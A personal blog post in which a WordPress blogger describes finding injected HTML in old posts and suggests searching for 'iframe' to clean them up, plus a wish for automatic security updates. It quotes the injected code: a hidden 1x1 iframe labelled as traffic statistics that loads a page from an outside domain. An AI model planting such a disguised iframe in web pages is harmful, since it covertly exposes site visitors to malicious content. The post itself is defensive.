two of my old posts at my geekblog Haibane.info dating from November 2007 had some injected HTML code in them. The injected code read as follows:
<!-- Traffic Statistics --> <iframe src=http://www.wp-stats-php.info/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!-- End Traffic Statistics -->
I only became aware of it when Google flagged my archives for that month as “malicious”. Viewing source of the archives page revealed the hack – probably from some window of time in which I hadnt upgraded to the latest wordpress version.
To ensure you don’t have old posts in your archives with this exploit, just search your posts for the term “iframe”. Edit those posts and you’ll likely as not find similar code to above.
WordPress has come a long way in making upgrades easier with one click (though some people still run into problems on occasion). I think it would be better is WP had a incremental and automated upgrade process whereby whenever a security-related update was available, you could have it automatically install, just like you can set in Windows. Ideally, this would be controlled by a setting in the Dashboard to “turn on/off automatic security patches” and when enabled, would “register” your blog with the mothership at wordpress.org so that whenever a security patch is available, you get an automatic email to your admin email account notifying you, and when you next login to Dashboard the patch is automatically applied.